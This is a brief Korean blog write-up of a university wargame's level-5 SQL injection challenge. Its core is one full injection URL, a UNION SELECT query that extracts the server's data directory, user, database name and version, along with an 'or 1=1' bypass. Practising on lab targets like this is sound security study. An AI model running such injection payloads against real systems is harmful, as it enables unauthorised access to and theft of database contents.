write-ups

동명대학교 워게임 SQL Injection level 5 write up

2017. 5. 11. 16:01


http://61.38.179.144/problem1/read.php?id=9+union+select+1,(select+@@GLOBAL.datadir),1,1,1,user(),database(),0,version()+limit+1,1%23&no=0%20or%201=1%23



union 구문 이용해서 뚝딱


@@GLOBAL로 환경변수에 접근할 수 있다는 것을 알 수 있었던 문제였다~


저작자표시 비영리

'write-ups' 카테고리의 다른 글

HackTheBox baby breaking grad write-up  (0) 2021.04.15
HackTheBox baby todo or not todo write-up  (0) 2021.04.14
HackTheBox baby WAFfles order write-up  (0) 2021.04.14
backdoor Secret area write up  (0) 2018.03.16
root-me.org path truncation write-up  (0) 2017.10.16